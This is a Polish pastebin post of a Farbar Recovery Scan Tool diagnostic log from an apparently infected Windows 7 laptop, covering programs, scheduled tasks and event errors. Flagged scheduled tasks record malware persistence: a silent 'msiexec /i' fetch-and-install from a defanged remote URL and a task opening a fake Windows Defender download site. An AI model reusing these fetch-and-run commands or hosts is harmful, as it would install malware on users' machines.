wklejto.pl

Dodane przez: ~chanka305 (2017-02-24 11:44) -> text
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.
26.
27.
28.
29.
30.
31.
32.
33.
34.
35.
36.
37.
38.
39.
40.
41.
42.
43.
44.
45.
46.
47.
48.
49.
50.
51.
52.
53.
54.
55.
56.
57.
58.
59.
60.
61.
62.
63.
64.
65.
66.
67.
68.
69.
70.
71.
72.
73.
74.
75.
76.
77.
78.
79.
80.
81.
82.
83.
84.
85.
86.
87.
88.
89.
90.
91.
92.
93.
94.
95.
96.
97.
98.
99.
100.
101.
102.
103.
104.
105.
106.
107.
108.
109.
110.
111.
112.
113.
114.
115.
116.
117.
118.
119.
120.
121.
122.
123.
124.
125.
126.
127.
128.
129.
130.
131.
132.
133.
134.
135.
136.
137.
138.
139.
140.
141.
142.
143.
144.
145.
146.
147.
148.
149.
150.
151.
152.
153.
154.
155.
156.
157.
158.
159.
160.
161.
162.
163.
164.
165.
166.
167.
168.
169.
170.
171.
172.
173.
174.
175.
176.
177.
178.
179.
180.
181.
182.
183.
184.
185.
186.
187.
188.
189.
190.
191.
192.
193.
194.
195.
196.
197.
198.
199.
200.
201.
202.
203.
204.
205.
206.
207.
208.
209.
210.
211.
212.
213.
214.
215.
216.
217.
218.
219.
220.
221.
222.
223.
224.
225.
226.
227.
228.
229.
230.
231.
232.
233.
234.
235.
236.
237.
238.
239.
240.
241.
242.
243.
244.
245.
246.
247.
248.
249.
250.
251.
252.
253.
254.
255.
256.
257.
258.
259.
260.
261.
262.
263.
264.
265.
266.
267.
Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x86) Wersja: 23-02-2017 01
Uruchomiony przez Hp (24-02-2017 11:42:21)
Uruchomiony z C:\Users\Hp\Downloads
Microsoft Windows 7 Ultimate  Service Pack 1 (X86) (2017-01-08 18:34:48)
Tryb startu: Normal
==========================================================
 
 
==================== Konta użytkowników: =============================
 
Administrator (S-1-5-21-3042491451-2743186755-4237710648-500 - Administrator - Disabled)
Gość (S-1-5-21-3042491451-2743186755-4237710648-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3042491451-2743186755-4237710648-1002 - Limited - Enabled)
Hp (S-1-5-21-3042491451-2743186755-4237710648-1000 - Administrator - Enabled) => C:\Users\Hp
 
==================== Centrum zabezpieczeń ========================
 
(Załączenie wejścia w fixlist spowoduje jego usunięcie.)
 
AV: Panda Free Antivirus (Enabled - Up to date) {AAF74A68-8713-CDF1-004F-30003398BE9E}
AS: Panda Free Antivirus (Enabled - Up to date) {1196AB8C-A129-C27F-3AFF-0B72481FF423}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Panda Firewall (Disabled) {92CCCB4D-CD7C-CCA9-2B10-9935CD4BF9E5}
 
==================== Zainstalowane programy ======================
 
(W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.)
 
Adobe Reader XI (11.0.19) - Polish (HKLM\...\{AC76BA86-7AD7-1045-7B44-AB0000000001}) (Version: 11.0.19 - Adobe Systems Incorporated)
AnySend (HKLM\...\ASPackage) (Version:  - ) <==== UWAGA
BikaQ Rss (HKLM\...\{78A2D999-4673-4FCC-818E-57B0AF8F3B70}) (Version: 2.0.16 - BikaQ)
HiSuite (HKLM\...\Hi Suite) (Version: 1.0 - Huawei Technologies Co.,Ltd)
HP 3D DriveGuard (HKLM\...\{9F92182D-24EB-4A4E-A318-E3E8011EF638}) (Version: 4.2.9.1 - Hewlett-Packard Company)
HP Quick Launch Buttons (HKLM\...\{34D2AB40-150D-475D-AE32-BD23FB5EE355}) (Version: 6.50.17.1 - Hewlett-Packard Company)
JetClean (HKLM\...\BlueSprig_JetClean_is1) (Version: 1.5.0 - BlueSprig)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation)
Mozilla Firefox 51.0.1 (x86 pl) (HKLM\...\Mozilla Firefox 51.0.1 (x86 pl)) (Version: 51.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 51.0.1.6234 - Mozilla)
Panda Devices Agent (Version: 1.03.07 - Panda Security) Hidden
Panda Devices Agent (Version: 1.06.00 - Panda Security) Hidden
Panda Free Antivirus (HKLM\...\Panda Universal Agent Endpoint) (Version: 16.01.01.0000 - Panda Security)
Panda Free Antivirus (Version: 8.20.00.0000 - Panda Security) Hidden
QLBCASL (Version: 6.40.17.2 - Hewlett-Packard) Hidden
RegRun Reanimator (HKLM\...\UnHackMe Update - Reanimator_is1) (Version:  - Greatis Software, LLC.)
Skype™ 7.32 (HKLM\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.32.103 - Skype Technologies S.A.)
Trans 4.7.6.7071 (HKLM\...\Trans_is1) (Version: 4.7.6.7071 - Logintrans sp. z o.o.)
WinRAR 5.21 (32-bitowy) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
WinSnare (HKLM\...\{C881D603-277F-4056-918D-654844EF2B37}) (Version: 4.1.6 - WinSnare) <==== UWAGA
 
==================== Niestandardowe rejestracje CLSID (filtrowane): ==========================
 
(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)
 
 
==================== Zaplanowane zadania (filtrowane) =============
 
(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)
 
Task: {12045E55-6ABD-4C6D-998E-A6ED1E767B48} - System32\Tasks\Foladomgracuge => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=HitachiXHTS543216L9A300_091001FBC200VCH10UXAX&amp;v=2017223 /q <==== UWAGA
Task: {31E295EE-5656-4AA3-AEC1-5E8D29149BEA} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-12-19] (Adobe Systems Incorporated)
Task: {3B3899E4-3515-46E8-903B-A294B29D4787} - System32\Tasks\RunAtStartup => C:\Users\Hp\AppData\Roaming\Event Monitor\em.exe [2017-01-05] () <==== UWAGA
Task: {4B877639-9C43-48F9-AD24-65B502D7CB08} - System32\Tasks\Ivegerucery Controls => C:\Program Files\Jzachsuiry\vervasy.exe [2017-02-23] (Glarysoft Ltd)
Task: {6EAB2BBC-31A7-4D8D-A770-98D3C21FFB8F} - System32\Tasks\JetCleanLoginCheckUpdate => C:\Program Files\BlueSprig\JetClean\AutoUpdate.exe [2013-05-14] (BlueSprig)
Task: {ACB8F76A-D484-41C8-A27A-709BEA149202} - System32\Tasks\Games\UpdateCheck_S-1-5-21-3042491451-2743186755-4237710648-1000
Task: {C8A614CD-6A4F-425A-8DF9-F66749A4FB6B} - System32\Tasks\Milimili => C:\Program Files\MIO\MIO.exe [2017-02-24] ()
Task: {CE45EFA1-AEAE-46C5-B9B5-D68CB4673823} - System32\Tasks\PPI Update => C:\Windows\explorer.exe "hxxp://windowsdefender.site/download/download.php?mn=9996" <==== UWAGA
Task: {F4B9E7CC-64B9-47B4-880C-EAB08AAFADA4} - System32\Tasks\BikaQ_FetchAndUpgrade_CanBeDel => C:\Program Files\BikaQRss\BikaQ.exe [2017-02-23] (IEC)
 
(Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.)
 
 
==================== Skróty =============================
 
(Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.)
 
==================== Załadowane moduły (filtrowane) ==============
 
2017-02-23 17:14 - 2017-02-23 17:14 - 00274944 _____ () C:\Program Files\Ivegerucery Controls\local32spl.dll
2017-02-20 19:40 - 2017-02-20 19:40 - 22049792 _____ () C:\Program Files\404c91f62c3c314573a07786aeee3329\5a77e519ffc5783439d7fac8cd5b9526.exe
2016-11-25 07:16 - 2016-11-25 07:16 - 00155848 _____ () C:\Program Files\HiSuite\HandSetService\HuaweiHiSuiteService.exe
2015-12-15 18:17 - 2015-12-15 18:17 - 00618544 _____ () C:\Program Files\Panda Security\Panda Security Protection\SQLite3.dll
2017-02-23 17:49 - 2017-01-05 18:45 - 03292608 _____ () C:\Users\Hp\AppData\Roaming\Event Monitor\em.exe
 
==================== Alternate Data Streams (filtrowane) =========
 
(Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.)
 
 
==================== Tryb awaryjny (filtrowane) ===================
 
(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\NanoServiceMain => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PSUAService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NanoServiceMain => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PSUAService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"
 
==================== Powiązania plików (filtrowane) ===============
 
(Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.)
 
 
==================== Internet Explorer - Witryny zaufane i z ograniczeniami ===============
 
(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.)
 
 
==================== Hosts - zawartość: ===============================
 
(Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.)
 
2009-07-14 03:04 - 2009-06-10 22:39 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts
 
 
==================== Inne obszary ============================
 
(Obecnie brak automatycznej naprawy dla tej sekcji.)
 
HKU\S-1-5-21-3042491451-2743186755-4237710648-1000\Control Panel\Desktop\\Wallpaper -> 
DNS Servers: 84.116.46.21 - 84.116.46.20
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Zapora systemu Windows [funkcja włączona]
 
==================== MSCONFIG/TASK MANAGER - Wyłączone elementy ==
 
 
==================== Reguły Zapory systemu Windows (filtrowane) ===============
 
(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)
 
FirewallRules: [{D6BF47B8-4B5F-42D2-9C27-F3472D5359C9}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [{8D8F7949-789F-4296-82E1-D524ECEAE9E3}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [{E1E7AA8D-6A3E-4B4D-8961-D6C499487B8F}] => (Allow) C:\Program Files\Skype\Phone\Skype.exe
 
==================== Punkty Przywracania systemu =========================
 
13-02-2017 11:22:31 Zaplanowany punkt kontrolny
20-02-2017 13:13:36 Zaplanowany punkt kontrolny
23-02-2017 17:07:01 Zainstalowano: OpenOffice.org 2.4
23-02-2017 23:22:39 Windows Defender Checkpoint
23-02-2017 23:56:38 Usunięto: OpenOffice.org 2.4
 
==================== Wadliwe urządzenia w Menedżerze urządzeń =============
 
 
==================== Błędy w Dzienniku zdarzeń: =========================
 
Dziennik Aplikacja:
==================
Error: (02/24/2017 11:06:34 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
Error: (02/24/2017 09:02:16 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
Error: (02/24/2017 07:19:01 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
Error: (02/24/2017 12:13:59 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
Error: (02/23/2017 11:34:16 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
Error: (02/23/2017 11:22:39 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Błąd Usługi kopiowania woluminów w tle: nieoczekiwany błąd podczas badania interfejsu IVssWriterCallback. hr = 0x80070005, Odmowa dostępu.
.
To jest często spowodowane przez niepoprawne ustawienia zabezpieczeń w procesie zapisującym lub żądającym.
 
 
Operacja:
   Zbieranie danych modułu zapisującego
 
Kontekst:
   Identyfikator klasy modułu zapisującego: {e8132975-6f93-4464-a53e-1050253ae220}
   Nazwa modułu zapisującego: System Writer
   Identyfikator wystąpienia modułu zapisującego: {e2f118fb-83ba-4b70-a84e-fde7d120d049}
 
Error: (02/23/2017 11:07:17 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
Error: (02/23/2017 05:15:47 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nazwa aplikacji powodującej błąd: setupos_4435.exe, wersja: 0.0.0.0, sygnatura czasowa: 0x57042e75
Nazwa modułu powodującego błąd: ntdll.dll, wersja: 6.1.7601.23455, sygnatura czasowa: 0x573a54ca
Kod wyjątku: 0xc0000008
Przesunięcie błędu: 0x00072a83
Identyfikator procesu powodującego błąd: 0xcd4
Godzina uruchomienia aplikacji powodującej błąd: 0x01d28df0099dd8b9
Ścieżka aplikacji powodującej błąd: C:\Users\Hp\AppData\Local\Temp\setupos_4435.exe
Ścieżka modułu powodującego błąd: C:\Windows\SYSTEM32\ntdll.dll
Identyfikator raportu: 558a6ccc-f9e3-11e6-8fd2-0027132bec6b
 
Error: (02/23/2017 05:15:24 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nazwa aplikacji powodującej błąd: setupos_4435.exe, wersja: 0.0.0.0, sygnatura czasowa: 0x57042e75
Nazwa modułu powodującego błąd: ntdll.dll, wersja: 6.1.7601.23455, sygnatura czasowa: 0x573a54ca
Kod wyjątku: 0xc0000264
Przesunięcie błędu: 0x000926fd
Identyfikator procesu powodującego błąd: 0xcd4
Godzina uruchomienia aplikacji powodującej błąd: 0x01d28df0099dd8b9
Ścieżka aplikacji powodującej błąd: C:\Users\Hp\AppData\Local\Temp\setupos_4435.exe
Ścieżka modułu powodującego błąd: C:\Windows\SYSTEM32\ntdll.dll
Identyfikator raportu: 47b0145f-f9e3-11e6-8fd2-0027132bec6b
 
Error: (02/23/2017 02:31:02 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
 
Dziennik System:
=============
Error: (02/23/2017 11:30:24 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Usługa Tower Photograph niespodziewanie zakończyła pracę. Wystąpiło to razy: 1.
 
Error: (02/23/2017 11:29:51 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Usługa Host Recipient niespodziewanie zakończyła pracę. Wystąpiło to razy: 1.
 
Error: (02/23/2017 11:05:40 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: Poprzednie zamknięcie systemu przy 23:04:15 na ‎2017-‎02-‎23 było nieoczekiwane.
 
Error: (02/23/2017 11:02:45 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: Poprzednie zamknięcie systemu przy 23:01:04 na ‎2017-‎02-‎23 było nieoczekiwane.
 
Error: (02/23/2017 03:03:34 PM) (Source: Schannel) (EventID: 4119) (User: ZARZĄDZANIE NT)
Description: Odebrano następujący alert krytyczny: 20.
 
Error: (02/23/2017 02:43:11 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: Usługa HuaweiHiSuiteService.exe jest oznaczona jako usługa interakcyjna. System jest jednak skonfigurowany tak, aby nie zezwalać na usługi interakcyjne, dlatego ta usługa może nie działać właściwie.
 
Error: (02/23/2017 02:30:36 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: Poprzednie zamknięcie systemu przy 14:27:06 na ‎2017-‎02-‎23 było nieoczekiwane.
 
Error: (02/21/2017 10:06:14 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: Serwer {F9717507-6651-4EDB-BFF7-AE615179BCCF} nie zarejestrował się w modelu DCOM w wymaganym czasie.
 
Error: (02/20/2017 02:26:36 PM) (Source: bowser) (EventID: 8003) (User: )
Description: Przeglądarka główna odebrała anons serwera z komputera ANNA-KOMPUTER.
Komputer ten zachowuje się tak, jakby był przeglądarką główną dla domeny w transporcie NetBT_Tcpip_{85D00648-4226-463C-A7B2-7EFD.
Przeglądarka główna właśnie jest zatrzymywana albo wymuszany jest wybór.
 
Error: (02/18/2017 11:16:11 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: Serwer {F9717507-6651-4EDB-BFF7-AE615179BCCF} nie zarejestrował się w modelu DCOM w wymaganym czasie.
 
 
==================== Statystyki pamięci =========================== 
 
Procesor: Intel(R) Core(TM)2 Duo CPU P8700 @ 2.53GHz
Procent pamięci w użyciu: 47%
Całkowita pamięć fizyczna: 2972.27 MB
Dostępna pamięć fizyczna: 1564.43 MB
Całkowita pamięć wirtualna: 5942.86 MB
Dostępna pamięć wirtualna: 4356.2 MB
 
==================== Dyski ================================
 
Drive c: () (Fixed) (Total:73.34 GB) (Free:53.99 GB) NTFS
Drive d: () (Fixed) (Total:75.22 GB) (Free:73.77 GB) NTFS
 
==================== MBR & Tablica partycji ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 149.1 GB) (Disk ID: 29510240)
Partition 1: (Active) - (Size=500 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=73.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=75.2 GB) - (Type=07 NTFS)
 
==================== Koniec  Addition.txt ============================
Wygenerowano w 0.025s, przy pomocy GeSHi 1.0.8
'
Podziel się na Facebook Podziel się na BLIP Podziel się na Twitter Podziel się na Buzz Podziel się na Flaker Dodaj zakładkę Google Podziel się na Delicious Wykop to!

Nowy Komentarz:

Komentarze:

Brak Komentarzy!